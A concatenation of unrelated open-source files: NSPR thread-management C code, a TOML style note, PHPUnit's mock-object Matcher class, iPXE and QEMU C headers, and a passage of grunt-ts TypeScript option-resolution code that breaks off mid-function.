THREAD_KEY_T cpuid_key;
THREAD_KEY_T last_thread_key;
/* |set| holds SIGALRM (built in _MD_EarlyInit below); |oldset| receives the
 * previous mask when alarms are blocked around native thread creation. */
static sigset_t set, oldset;
/* Create the TLS keys and prepare the SIGALRM signal mask. */
void _MD_EarlyInit(void)
{
THR_KEYCREATE(&threadid_key, NULL);
THR_KEYCREATE(&cpuid_key, NULL);
THR_KEYCREATE(&last_thread_key, NULL);
sigemptyset(&set);
sigaddset(&set, SIGALRM);
}
/* Create a native Solaris thread for |thread|.  The thread is created
 * suspended, its priority is set, and only then is it released via
 * thr_continue().  SIGALRM is blocked for the duration of thr_create().
 * Returns PR_FAILURE if creation or activation fails. */
PRStatus _MD_CREATE_THREAD(PRThread *thread,
void (*start)(void *),
PRThreadPriority priority,
PRThreadScope scope,
PRThreadState state,
PRUint32 stackSize)
{
long flags;
/* mask out SIGALRM for native thread creation */
thr_sigsetmask(SIG_BLOCK, &set, &oldset);
/* Joinable threads stay attached; others are created detached.  All are
 * created suspended so priority can be set before they run. */
flags = (state == PR_JOINABLE_THREAD ? THR_SUSPENDED/*|THR_NEW_LWP*/
: THR_SUSPENDED|THR_DETACHED/*|THR_NEW_LWP*/);
/* GCable and explicitly bound threads get their own LWP. */
if (_PR_IS_GCABLE_THREAD(thread) ||
(scope == PR_GLOBAL_BOUND_THREAD))
flags |= THR_BOUND;
if (thr_create(NULL, thread->stack->stackSize,
(void *(*)(void *)) start, (void *) thread,
flags,
&thread->md.handle)) {
/* Creation failed: restore the signal mask before bailing out. */
thr_sigsetmask(SIG_SETMASK, &oldset, NULL);
return PR_FAILURE;
}
/* When the thread starts running, then the lwpid is set to the right
* value. Until then we want to mark this as 'uninit' so that
* its register state is initialized properly for GC */
thread->md.lwpid = -1;
thr_sigsetmask(SIG_SETMASK, &oldset, NULL);
_MD_NEW_SEM(&thread->md.waiter_sem, 0);
if ((scope == PR_GLOBAL_THREAD) || (scope == PR_GLOBAL_BOUND_THREAD)) {
thread->flags |= _PR_GLOBAL_SCOPE;
}
/*
** Set the thread priority. This will also place the thread on
** the runQ.
**
** Force PR_SetThreadPriority to set the priority by
** setting thread->priority to 100.
*/
{
int pri;
pri = thread->priority;
thread->priority = 100;
PR_SetThreadPriority( thread, pri );
PR_LOG(_pr_thread_lm, PR_LOG_MIN,
("(0X%x)[Start]: on to runq at priority %d",
thread, thread->priority));
}
/* Activate the thread */
if (thr_continue( thread->md.handle ) ) {
return PR_FAILURE;
}
return PR_SUCCESS;
}
/*
 * Tear down the machine-dependent parts of a dying thread: suspend it
 * (unless it is the calling thread) and destroy its waiter semaphore.
 */
void _MD_cleanup_thread(PRThread *thread)
{
    thread_t hdl;

    hdl = thread->md.handle;

    /*
    ** First, suspend the thread (unless it's the active one)
    ** Because we suspend it first, we don't have to use LOCK_SCHEDULER to
    ** prevent both of us modifying the thread structure at the same time.
    */
    if ( thread != _PR_MD_CURRENT_THREAD() ) {
        thr_suspend(hdl);
    }
    PR_LOG(_pr_thread_lm, PR_LOG_MIN,
           ("(0X%x)[DestroyThread]\n", thread));

    /* Cleanup: removed unused local 'PRMonitor *mon' (declared, never used). */
    _MD_DESTROY_SEM(&thread->md.waiter_sem);
}
/* Set the underlying Solaris thread's priority; logs (but does not fail)
 * when thr_setprio() reports an error. */
void _MD_SET_PRIORITY(_MDThread *md_thread, PRUintn newPri)
{
if(thr_setprio((thread_t)md_thread->handle, newPri)) {
PR_LOG(_pr_thread_lm, PR_LOG_MIN,
("_PR_SetThreadPriority: can't set thread priority\n"));
}
}
/* Wait on |md_cv| with an absolute deadline computed from the relative
 * |timeout|.  The caller must hold |md_lock|. */
void _MD_WAIT_CV(
struct _MDCVar *md_cv, struct _MDLock *md_lock, PRIntervalTime timeout)
{
struct timespec tt;
PRUint32 msec;
int rv; /* NOTE(review): appears unused -- the COND_TIMEDWAIT result is deliberately ignored below; confirm the macro does not reference 'rv'. */
PRThread *me = _PR_MD_CURRENT_THREAD();
msec = PR_IntervalToMilliseconds(timeout);
/* Convert the relative timeout into an absolute timespec deadline. */
GETTIME (&tt);
tt.tv_sec += msec / PR_MSEC_PER_SEC;
tt.tv_nsec += (msec % PR_MSEC_PER_SEC) * PR_NSEC_PER_MSEC;
/* Check for nsec overflow - otherwise we'll get an EINVAL */
if (tt.tv_nsec >= PR_NSEC_PER_SEC) {
tt.tv_sec++;
tt.tv_nsec -= PR_NSEC_PER_SEC;
}
/* Record the stack pointer so the GC can scan this thread while blocked. */
me->md.sp = unixware_getsp();
/* XXX Solaris 2.5.x gives back EINTR occasionally for no reason
* hence ignore EINTR for now */
COND_TIMEDWAIT(&md_cv->cv, &md_lock->lock, &tt);
}
/* Acquire the machine-dependent lock. */
void _MD_lock(struct _MDLock *md_lock)
{
    mutex_lock(&md_lock->lock);
}

/* Release the machine-dependent lock. */
void _MD_unlock(struct _MDLock *md_lock)
{
    mutex_unlock(&md_lock->lock);
}
/* Return the PRThread stored in this native thread's TLS slot. */
PRThread *_pr_current_thread_tls()
{
PRThread *ret;
thr_getspecific(threadid_key, (void **)&ret);
return ret;
}
/* Block the calling thread on its waiter semaphore until it is posted.
 * |ticks| is unused: the wait is indefinite. */
PRStatus
_MD_WAIT(PRThread *thread, PRIntervalTime ticks)
{
_MD_WAIT_SEM(&thread->md.waiter_sem);
return PR_SUCCESS;
}
/* Wake the given thread by posting its waiter semaphore.  A NULL thread
 * means there is nobody to wake and is treated as success. */
PRStatus
_MD_WAKEUP_WAITER(PRThread *thread)
{
    if (thread != NULL) {
        _MD_POST_SEM(&thread->md.waiter_sem);
    }
    return PR_SUCCESS;
}
/* Return the _PRCPU stored in this native thread's TLS slot. */
_PRCPU *_pr_current_cpu_tls()
{
_PRCPU *ret;
thr_getspecific(cpuid_key, (void **)&ret);
return ret;
}
/* Return the last-run PRThread stored in this native thread's TLS slot. */
PRThread *_pr_last_thread_tls()
{
PRThread *ret;
thr_getspecific(last_thread_key, (void **)&ret);
return ret;
}
/* Global lock protecting the I/O queue. */
_MDLock _pr_ioq_lock;
/* Machine-dependent I/O initialization: just create the I/O queue lock. */
void _MD_INIT_IO (void)
{
_MD_NEW_LOCK(&_pr_ioq_lock);
}
/*
 * Initialize the machine-dependent state of |thread|: prime the saved stack
 * pointer for GC, record the lwp id and native thread handle, and -- for the
 * primordial/attached thread, which never goes through _MD_CREATE_THREAD() --
 * allocate its waiter semaphore and set its native priority.
 */
PRStatus _MD_InitializeThread(PRThread *thread)
{
    if (!_PR_IS_NATIVE_THREAD(thread)) {
        /* Bug fix: this function returns PRStatus, but the original code used
         * a bare 'return;' here, which is invalid in a non-void function.
         * Nothing needs to be done for non-native threads. */
        return PR_SUCCESS;
    }

    /* prime the sp; subtract a word so we don't hit the assert that
     * curr sp > base_stack */
    thread->md.sp = (uint_t) thread->stack->allocBase - sizeof(long);
    thread->md.lwpid = _lwp_self();
    thread->md.handle = THR_SELF();

    /* all threads on Solaris are global threads from NSPR's perspective
     * since all of them are mapped to Solaris threads. */
    thread->flags |= _PR_GLOBAL_SCOPE;

    /* For primordial/attached thread, we don't create an underlying native
     * thread, so _MD_CREATE_THREAD() does not get called.  Do the equivalent
     * initialization here: allocate the thread's synchronization semaphore
     * and set the underlying native thread's priority. */
    if (thread->flags & (_PR_PRIMORDIAL | _PR_ATTACHED)) {
        _MD_NEW_SEM(&thread->md.waiter_sem, 0);
        _MD_SET_PRIORITY(&(thread->md), thread->priority);
    }
    return PR_SUCCESS;
}
static sigset_t old_mask; /* store away original gc thread sigmask */
static int gcprio; /* store away original gc thread priority */
/* NOTE(review): all_lwps/num_lwps are not referenced anywhere in the visible
 * code; presumably used (or once used) by lwp suspend bookkeeping. */
static lwpid_t *all_lwps=NULL; /* list of lwps that we suspended */
static int num_lwps ;
static int suspendAllOn = 0;
/* True iff sp lies strictly between bottom and top (stack bounds check). */
#define VALID_SP(sp, bottom, top) \
(((uint_t)(sp)) > ((uint_t)(bottom)) && ((uint_t)(sp)) < ((uint_t)(top)))
/* Block all signals, saving the previous mask in old_mask, so the GC thread
 * cannot be preempted by a signal.
 * NOTE(review): the local 'set' shadows the file-static 'set' declared above. */
void unixware_preempt_off()
{
sigset_t set;
(void)sigfillset(&set);
sigprocmask (SIG_SETMASK, &set, &old_mask);
}
/* Restore the signal mask saved by unixware_preempt_off(). */
void unixware_preempt_on()
{
sigprocmask (SIG_SETMASK, &old_mask, NULL);
}
/* Begin stop-the-world: disable signal preemption and raise this thread to
 * the maximum priority so it cannot be scheduled away while suspending the
 * other threads. */
void _MD_Begin_SuspendAll()
{
unixware_preempt_off();
PR_LOG(_pr_gc_lm, PR_LOG_ALWAYS, ("Begin_SuspendAll\n"));
/* run at highest prio so I cannot be preempted */
thr_getprio(thr_self(), &gcprio);
thr_setprio(thr_self(), 0x7fffffff);
suspendAllOn = 1;
}
/* Nothing to do between suspend-all and resume-all; kept for the MD API. */
void _MD_End_SuspendAll()
{
}
/* End stop-the-world: restore the original priority, re-enable preemption
 * and clear the suspend-all flag. */
void _MD_End_ResumeAll()
{
PR_LOG(_pr_gc_lm, PR_LOG_ALWAYS, ("End_ResumeAll\n"));
thr_setprio(thr_self(), gcprio);
unixware_preempt_on();
suspendAllOn = 0;
}
/*
 * Suspend |thr| for garbage collection.  The underlying Solaris thread is
 * always suspended; the GC-specific lwp handling is skipped for non-GCable
 * threads, the primordial thread, and threads that have not started yet.
 */
void _MD_Suspend(PRThread *thr)
{
    /* Cleanup: removed unused locals 'lwp_fd', 'result' and
     * 'lwp_main_proc_fd' (declared, never used). */
    thr_suspend(thr->md.handle);
    if (!_PR_IS_GCABLE_THREAD(thr))
        return;
    /* XXX Primordial thread can't be bound to an lwp, hence there is no
     * way we can assume that we can get the lwp status for primordial
     * thread reliably. Hence we skip this for primordial thread, hoping
     * that the SP is saved during lock and cond. wait.
     * XXX - Again this is concern only for java interpreter, not for the
     * server, 'cause primordial thread in the server does not do java work
     */
    if (thr->flags & _PR_PRIMORDIAL)
        return;
    /* if the thread is not started yet then don't do anything */
    if (!suspendAllOn || thr->md.lwpid == -1)
        return;
}
/* Resume a thread suspended by _MD_Suspend().  Non-GCable threads (or any
 * thread outside a suspend-all window) are resumed via thr_continue();
 * GCable threads are resumed at the lwp level. */
void _MD_Resume(PRThread *thr)
{
if (!_PR_IS_GCABLE_THREAD(thr) || !suspendAllOn){
/*XXX When the suspendAllOn is set, we will be trying to do lwp_suspend
* during that time we can't call any thread lib or libc calls. Hence
* make sure that no resume is requested for Non gcable thread
* during suspendAllOn */
PR_ASSERT(!suspendAllOn);
thr_continue(thr->md.handle);
return;
}
/* Never started: there is no lwp to resume. */
if (thr->md.lwpid == -1)
return;
if ( _lwp_continue(thr->md.lwpid) < 0) {
PR_ASSERT(0); /* ARGH, we are hosed! */
}
}
/* Capture the register set of |t| for GC scanning; the current thread's
 * context is refreshed via getcontext() first.  Threads that never ran
 * (lwpid == -1) report an all-zero register set. */
PRWord *_MD_HomeGCRegisters(PRThread *t, int isCurrent, int *np)
{
if (isCurrent) {
(void) getcontext(CONTEXT(t)); /* XXX tune me: set md_IRIX.c */
}
*np = NGREG;
if (t->md.lwpid == -1)
memset(&t->md.context.uc_mcontext.gregs[0], 0, NGREG * sizeof(PRWord));
return (PRWord*) &t->md.context.uc_mcontext.gregs[0];
}
/*
 * Fill *tp with the current wall-clock time, emulating clock_gettime()
 * on top of gettimeofday().  Always returns 0; gettimeofday's own result
 * is not checked (matching the original behaviour).
 */
int
_pr_unixware_clock_gettime (struct timespec *tp)
{
    struct timeval now;

    gettimeofday(&now, NULL);
    tp->tv_sec = now.tv_sec;
    tp->tv_nsec = now.tv_usec * 1000;
    return 0;
}
#endif /* USE_SVR4_THREADS */
| {
"pile_set_name": "Github"
} |
.. _toml-style-guide:
****************
TOML style guide
****************
Keys must be ASCII snake_case.
| {
"pile_set_name": "Github"
} |
<?php
/**
* PHPUnit
*
* Copyright (c) 2010-2012, Sebastian Bergmann <[email protected]>.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* * Neither the name of Sebastian Bergmann nor the names of his
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* @package PHPUnit_MockObject
* @author Sebastian Bergmann <[email protected]>
* @copyright 2010-2012 Sebastian Bergmann <[email protected]>
* @license http://www.opensource.org/licenses/BSD-3-Clause The BSD 3-Clause License
* @link http://github.com/sebastianbergmann/phpunit-mock-objects
* @since File available since Release 1.0.0
*/
/**
* Main matcher which defines a full expectation using method, parameter and
* invocation matchers.
* This matcher encapsulates all the other matchers and allows the builder to
* set the specific matchers when the appropriate methods are called (once(),
* where() etc.).
*
* All properties are public so that they can easily be accessed by the builder.
*
* @package PHPUnit_MockObject
* @author Sebastian Bergmann <[email protected]>
* @copyright 2010-2012 Sebastian Bergmann <[email protected]>
* @license http://www.opensource.org/licenses/BSD-3-Clause The BSD 3-Clause License
* @version Release: @package_version@
* @link http://github.com/sebastianbergmann/phpunit-mock-objects
* @since Class available since Release 1.0.0
*/
class PHPUnit_Framework_MockObject_Matcher implements PHPUnit_Framework_MockObject_Matcher_Invocation
{
    /**
     * @var PHPUnit_Framework_MockObject_Matcher_Invocation
     */
    public $invocationMatcher;

    /**
     * Identifier of a builder whose expectation must be satisfied before
     * this one may match, or NULL for no ordering constraint.
     *
     * @var mixed
     */
    public $afterMatchBuilderId = NULL;

    /**
     * @var boolean
     */
    public $afterMatchBuilderIsInvoked = FALSE;

    /**
     * @var PHPUnit_Framework_MockObject_Matcher_MethodName
     */
    public $methodNameMatcher = NULL;

    /**
     * @var PHPUnit_Framework_MockObject_Matcher_Parameters
     */
    public $parametersMatcher = NULL;

    /**
     * @var PHPUnit_Framework_MockObject_Stub
     */
    public $stub = NULL;

    /**
     * @param PHPUnit_Framework_MockObject_Matcher_Invocation $invocationMatcher
     */
    public function __construct(PHPUnit_Framework_MockObject_Matcher_Invocation $invocationMatcher)
    {
        $this->invocationMatcher = $invocationMatcher;
    }

    /**
     * Human-readable description of the full expectation, built from the
     * descriptions of every configured sub-matcher.
     *
     * @return string
     */
    public function toString()
    {
        $list = array();

        if ($this->invocationMatcher !== NULL) {
            $list[] = $this->invocationMatcher->toString();
        }

        if ($this->methodNameMatcher !== NULL) {
            $list[] = 'where ' . $this->methodNameMatcher->toString();
        }

        if ($this->parametersMatcher !== NULL) {
            $list[] = 'and ' . $this->parametersMatcher->toString();
        }

        if ($this->afterMatchBuilderId !== NULL) {
            $list[] = 'after ' . $this->afterMatchBuilderId;
        }

        if ($this->stub !== NULL) {
            $list[] = 'will ' . $this->stub->toString();
        }

        // implode() is the canonical name; join() is merely an alias.
        return implode(' ', $list);
    }

    /**
     * Registers an invocation against this expectation and returns the
     * stubbed result (or NULL when no stub is configured).
     *
     * @param  PHPUnit_Framework_MockObject_Invocation $invocation
     * @return mixed
     * @throws PHPUnit_Framework_Exception
     * @throws PHPUnit_Framework_ExpectationFailedException
     */
    public function invoked(PHPUnit_Framework_MockObject_Invocation $invocation)
    {
        $this->ensureMatchersConfigured();

        if ($this->afterMatchBuilderId !== NULL) {
            $matcher = $this->lookupAfterMatchBuilderMatcher($invocation);

            if ($matcher && $matcher->invocationMatcher->hasBeenInvoked()) {
                $this->afterMatchBuilderIsInvoked = TRUE;
            }
        }

        $this->invocationMatcher->invoked($invocation);

        try {
            // When the parameters do not match, delegate to verify(), which is
            // expected to raise a descriptive failure (preserved behaviour).
            if ( $this->parametersMatcher !== NULL &&
                !$this->parametersMatcher->matches($invocation)) {
                $this->parametersMatcher->verify();
            }
        }

        catch (PHPUnit_Framework_ExpectationFailedException $e) {
            throw new PHPUnit_Framework_ExpectationFailedException(
              sprintf(
                "Expectation failed for %s when %s\n%s",

                $this->methodNameMatcher->toString(),
                $this->invocationMatcher->toString(),
                $e->getMessage()
              ),
              $e->getComparisonFailure()
            );
        }

        if ($this->stub) {
            return $this->stub->invoke($invocation);
        }

        return NULL;
    }

    /**
     * Checks whether this expectation matches the given invocation, taking
     * any after-match ordering constraint into account.
     *
     * @param  PHPUnit_Framework_MockObject_Invocation $invocation
     * @return boolean
     * @throws PHPUnit_Framework_Exception
     * @throws PHPUnit_Framework_ExpectationFailedException
     */
    public function matches(PHPUnit_Framework_MockObject_Invocation $invocation)
    {
        // The after-match constraint is evaluated before the configuration
        // guards, matching the original order of checks.
        if ($this->afterMatchBuilderId !== NULL) {
            $matcher = $this->lookupAfterMatchBuilderMatcher($invocation);

            if (!$matcher) {
                return FALSE;
            }

            if (!$matcher->invocationMatcher->hasBeenInvoked()) {
                return FALSE;
            }
        }

        $this->ensureMatchersConfigured();

        if (!$this->invocationMatcher->matches($invocation)) {
            return FALSE;
        }

        try {
            if (!$this->methodNameMatcher->matches($invocation)) {
                return FALSE;
            }
        }

        catch (PHPUnit_Framework_ExpectationFailedException $e) {
            throw new PHPUnit_Framework_ExpectationFailedException(
              sprintf(
                "Expectation failed for %s when %s\n%s",

                $this->methodNameMatcher->toString(),
                $this->invocationMatcher->toString(),
                $e->getMessage()
              ),
              $e->getComparisonFailure()
            );
        }

        return TRUE;
    }

    /**
     * Verifies that this expectation was satisfied.
     *
     * @throws PHPUnit_Framework_Exception
     * @throws PHPUnit_Framework_ExpectationFailedException
     */
    public function verify()
    {
        $this->ensureMatchersConfigured();

        try {
            $this->invocationMatcher->verify();

            if ($this->parametersMatcher === NULL) {
                $this->parametersMatcher = new PHPUnit_Framework_MockObject_Matcher_AnyParameters;
            }

            // Parameter expectations are only verified when a specific
            // invocation-count matcher was configured.
            $invocationIsAny = get_class($this->invocationMatcher) === 'PHPUnit_Framework_MockObject_Matcher_AnyInvokedCount';

            if (!$invocationIsAny) {
                $this->parametersMatcher->verify();
            }
        }

        catch (PHPUnit_Framework_ExpectationFailedException $e) {
            throw new PHPUnit_Framework_ExpectationFailedException(
              sprintf(
                "Expectation failed for %s when %s.\n%s",

                $this->methodNameMatcher->toString(),
                $this->invocationMatcher->toString(),
                $e->getMessage()
              )
            );
        }
    }

    /**
     * Ensures that both an invocation matcher and a method name matcher have
     * been configured; these are required by invoked(), matches() and verify().
     * Extracted from the three methods above, which duplicated these guards.
     *
     * @throws PHPUnit_Framework_Exception
     */
    protected function ensureMatchersConfigured()
    {
        if ($this->invocationMatcher === NULL) {
            throw new PHPUnit_Framework_Exception(
              'No invocation matcher is set'
            );
        }

        if ($this->methodNameMatcher === NULL) {
            throw new PHPUnit_Framework_Exception('No method matcher is set');
        }
    }

    /**
     * Looks up the matcher belonging to $this->afterMatchBuilderId on the
     * invocation's mock object.  Extracted from invoked() and matches(),
     * which duplicated this lookup.
     *
     * @param  PHPUnit_Framework_MockObject_Invocation $invocation
     * @return PHPUnit_Framework_MockObject_Matcher|NULL
     * @throws PHPUnit_Framework_Exception When no builder exists for the id.
     */
    protected function lookupAfterMatchBuilderMatcher(PHPUnit_Framework_MockObject_Invocation $invocation)
    {
        $builder = $invocation->object
          ->__phpunit_getInvocationMocker()
          ->lookupId($this->afterMatchBuilderId);

        if (!$builder) {
            throw new PHPUnit_Framework_Exception(
              sprintf(
                'No builder found for match builder identification <%s>',
                $this->afterMatchBuilderId
              )
            );
        }

        return $builder->getMatcher();
    }
}
| {
"pile_set_name": "Github"
} |
#ifndef _IPXE_CPIO_H
#define _IPXE_CPIO_H
/** @file
*
* CPIO archives
*
*/
FILE_LICENCE ( GPL2_OR_LATER_OR_UBDL );
/** A CPIO archive header ("newc" format)
 *
 * All fields are hexadecimal ASCII numbers padded with '0' on the
 * left to the full width of the field.
 */
struct cpio_header {
/** The string "070701" or "070702" */
char c_magic[6];
/** File inode number */
char c_ino[8];
/** File mode and permissions */
char c_mode[8];
/** File uid */
char c_uid[8];
/** File gid */
char c_gid[8];
/** Number of links */
char c_nlink[8];
/** Modification time */
char c_mtime[8];
/** Size of data field */
char c_filesize[8];
/** Major part of file device number */
char c_maj[8];
/** Minor part of file device number */
char c_min[8];
/** Major part of device node reference */
char c_rmaj[8];
/** Minor part of device node reference */
char c_rmin[8];
/** Length of filename, including final NUL */
char c_namesize[8];
/** Checksum of data field if c_magic is 070702, otherwise zero */
char c_chksum[8];
} __attribute__ (( packed ));
/** CPIO magic (the "070701" variant, i.e. no data checksum) */
#define CPIO_MAGIC "070701"
/* Write |value| into |field| as zero-padded hexadecimal ASCII. */
extern void cpio_set_field ( char *field, unsigned long value );
#endif /* _IPXE_CPIO_H */
| {
"pile_set_name": "Github"
} |
#ifndef __SH_INTC_H__
#define __SH_INTC_H__
#include "qemu-common.h"
#include "irq.h"
/* Compact identifier for an interrupt source or group. */
typedef unsigned char intc_enum;
/* Maps an interrupt source id to its vector number. */
struct intc_vect {
intc_enum enum_id;
unsigned short vect;
};
#define INTC_VECT(enum_id, vect) { enum_id, vect }
/* A named group of up to 32 interrupt sources. */
struct intc_group {
intc_enum enum_id;
intc_enum enum_ids[32];
};
#define INTC_GROUP(enum_id, ...) { enum_id, { __VA_ARGS__ } }
/* Describes a mask register pair (set/clear) and the sources it controls. */
struct intc_mask_reg {
unsigned long set_reg, clr_reg, reg_width;
intc_enum enum_ids[32];
unsigned long value;
};
/* Describes a priority register and the sources whose priority it holds. */
struct intc_prio_reg {
unsigned long set_reg, clr_reg, reg_width, field_width;
intc_enum enum_ids[16];
unsigned long value;
};
/* Expands an array into the (pointer, count) argument pair used below. */
#define _INTC_ARRAY(a) a, ARRAY_SIZE(a)
/* Runtime state for a single interrupt source. */
struct intc_source {
unsigned short vect;
intc_enum next_enum_id;
int asserted; /* emulates the interrupt signal line from device to intc */
int enable_count;
int enable_max;
int pending; /* emulates the result of signal and masking */
struct intc_desc *parent;
};
/* Top-level interrupt controller state: all sources plus their mask and
 * priority registers. */
struct intc_desc {
qemu_irq *irqs;
struct intc_source *sources;
int nr_sources;
struct intc_mask_reg *mask_regs;
int nr_mask_regs;
struct intc_prio_reg *prio_regs;
int nr_prio_regs;
int iomemtype;
int pending; /* number of interrupt sources that has pending set */
};
/* Return the highest-priority pending vector given the CPU's interrupt mask. */
int sh_intc_get_pending_vector(struct intc_desc *desc, int imask);
/* Look up the source for an interrupt id. */
struct intc_source *sh_intc_source(struct intc_desc *desc, intc_enum id);
/* Adjust a source's enable/assert counters and recompute its pending state. */
void sh_intc_toggle_source(struct intc_source *source,
int enable_adj, int assert_adj);
/* Register vectors and groups with the controller. */
void sh_intc_register_sources(struct intc_desc *desc,
struct intc_vect *vectors,
int nr_vectors,
struct intc_group *groups,
int nr_groups);
/* Allocate and initialize the controller's sources and register tables. */
int sh_intc_init(struct intc_desc *desc,
int nr_sources,
struct intc_mask_reg *mask_regs,
int nr_mask_regs,
struct intc_prio_reg *prio_regs,
int nr_prio_regs);
/* IRQ input handler for the external IRL lines. */
void sh_intc_set_irl(void *opaque, int n, int level);
#endif /* __SH_INTC_H__ */
| {
"pile_set_name": "Github"
} |
/// <reference path="../../defs/tsd.d.ts"/>
/// <reference path="./interfaces.d.ts"/>
'use strict';
import {GruntTSDefaults} from './defaults';
import * as utils from './utils';
import * as _ from 'lodash';
import {Promise} from 'es6-promise';
import {resolveVSOptionsAsync} from './visualStudioOptionsResolver';
import {resolveAsync as resolveTSConfigAsync} from './tsconfig';
// Compiler Options documentation:
// https://github.com/Microsoft/TypeScript-Handbook/blob/master/pages/Compiler%20Options.md
// Properties that are recognized directly on the task/target level of the
// Gruntfile (as opposed to inside `options`).
const propertiesFromTarget = ['amdloader', 'baseDir', 'html', 'htmlOutDir', 'htmlOutDirFlatten', 'reference', 'testExecute', 'tsconfig',
'templateCache', 'vs', 'watch'],
// supported via other code: out, outDir, outFile, project
// Properties that are recognized inside the `options` object of a task or
// target; mostly TypeScript compiler flags plus grunt-ts extras.
propertiesFromTargetOptions = ['additionalFlags',
'allowJs',
'allowSyntheticDefaultImports',
'allowUnreachableCode',
'allowUnusedLabels',
'alwaysStrict',
'baseUrl',
'charset',
'comments',
'compile',
'compiler',
'declaration',
'declarationDir',
'diagnostics',
'disableSizeLimit',
'emitBOM',
'emitDecoratorMetadata',
'emitGruntEvents',
'experimentalAsyncFunctions',
'experimentalDecorators',
'failOnTypeErrors',
'fast',
/* help purposefully not supported. */
'forceConsistentCasingInFileNames',
'htmlModuleTemplate',
'htmlOutDir',
'htmlOutDirFlatten',
'htmlOutputTemplate',
'htmlVarTemplate',
'importHelpers',
'inlineSourceMap',
'inlineSources',
/* init purposefully not supported. */
'isolatedModules',
'jsx',
'jsxFactory',
'lib',
'listEmittedFiles',
'listFiles',
'locale',
'mapRoot',
'maxNodeModuleJsDepth',
'module',
'moduleResolution',
'newLine',
'noEmit',
'noEmitHelpers',
'noEmitOnError',
'noFallthroughCasesInSwitch',
'noImplicitAny',
'noImplicitReturns',
'noImplicitThis',
'noImplicitUseStrict',
'noLib',
'noResolve',
'noUnusedLocals',
'noUnusedParameters',
/* paths is purposefully not supported - requires use of tsconfig.json */
'preserveConstEnums',
'pretty',
'reactNamespace',
'removeComments',
'rootDir',
/* rootDirs is purposefully not supported - requires use of tsconfig.json */
'skipDefaultLibCheck',
'skipLibCheck',
'sourceMap',
'sourceRoot',
'strictNullChecks',
'stripInternal',
'suppressExcessPropertyErrors',
'suppressImplicitAnyIndexErrors',
'target',
'traceResolution',
'types',
'typeRoots',
/* version is purposefully not supported. */
/* watch is purposefully not supported. */
'verbose'],
// Properties whose template expansion is deferred until they are used
// (they may reference per-file data not available at resolve time).
delayTemplateExpansion = ['htmlModuleTemplate', 'htmlVarTemplate', 'htmlOutputTemplate'];
// Module-level collaborators injected by resolveAsync; defaulted to no-op
// stubs when the caller does not provide real implementations.
let templateProcessor: (templateString: string, options: any) => string = null;
let globExpander: (globs: string[]) => string[] = null;
let verboseLogger: (logText: string) => void = null;
// Pass-through template processor used when the caller supplies none:
// returns the template text unchanged and ignores the options bag.
function noopTemplateProcessor(template: string, unusedOptions: any) {
    return template;
}
// Glob expander placeholder that never matches anything.  It is tagged
// with `isStub` so downstream code can detect that real glob support is
// unavailable.
function emptyGlobExpander(globs: string[]): string[] {
    const nothing: string[] = [];
    return nothing;
}
(<any>emptyGlobExpander).isStub = true;
// Verbose logger used when none is provided; deliberately discards the
// message.
function emptyVerboseLogger(ignoredLogText: string) {
    // Intentionally does nothing.
}
/**
 * Entry point of option resolution: merges raw task- and target-level Grunt
 * configuration, Visual Studio project settings and tsconfig.json into a
 * single IGruntTSOptions object.  The returned promise always resolves
 * (never rejects); failures are reported via result.errors / result.warnings.
 */
export function resolveAsync(rawTaskOptions: ITargetOptions,
rawTargetOptions: ITargetOptions,
targetName = '',
resolvedFiles: IGruntTSCompilationInfo[] = [],
theTemplateProcessor: typeof templateProcessor = null,
theGlobExpander: typeof globExpander = null,
theVerboseLogger: typeof verboseLogger = null): Promise<IGruntTSOptions> {
let result = emptyOptionsResolveResult();
return new Promise<IGruntTSOptions>((resolve, reject) => {
// Install the injected collaborators, falling back to no-op stubs so the
// rest of the pipeline never has to null-check them.
if (theTemplateProcessor && typeof theTemplateProcessor === 'function') {
templateProcessor = theTemplateProcessor;
} else {
templateProcessor = noopTemplateProcessor;
}
if (theGlobExpander && typeof theGlobExpander === 'function') {
globExpander = theGlobExpander;
} else {
globExpander = emptyGlobExpander;
}
if (theVerboseLogger && typeof theVerboseLogger === 'function') {
verboseLogger = theVerboseLogger;
} else {
verboseLogger = emptyVerboseLogger;
}
// Guarantee both raw configs have an `options` member before inspection.
fixMissingOptions(rawTaskOptions);
fixMissingOptions(rawTargetOptions);
{
// Collect (and where possible auto-fix) configuration mistakes first.
const {errors, warnings} = resolveAndWarnOnConfigurationIssues(rawTaskOptions, rawTargetOptions, targetName);
result.errors.push(...errors);
result.warnings.push(...warnings);
}
// Task-level options first, then target-level so the target wins.
result = applyGruntOptions(result, rawTaskOptions);
result = applyGruntOptions(result, rawTargetOptions);
result = copyCompilationTasks(result, resolvedFiles, resolveOutputOptions(rawTaskOptions, rawTargetOptions));
// VS project settings, then tsconfig.json, then conflict resolution and
// defaults.  Note: both catch handlers resolve (not reject) with the
// partial result so callers can surface the accumulated errors.
resolveVSOptionsAsync(result, rawTaskOptions, rawTargetOptions, templateProcessor).then((result) => {
resolveTSConfigAsync(result, rawTaskOptions, rawTargetOptions, templateProcessor, globExpander, verboseLogger).then((result) => {
result = addressAssociatedOptionsAndResolveConflicts(result);
result = enclosePathsInQuotesIfRequired(result);
result = logAdditionalConfigurationWarnings(result);
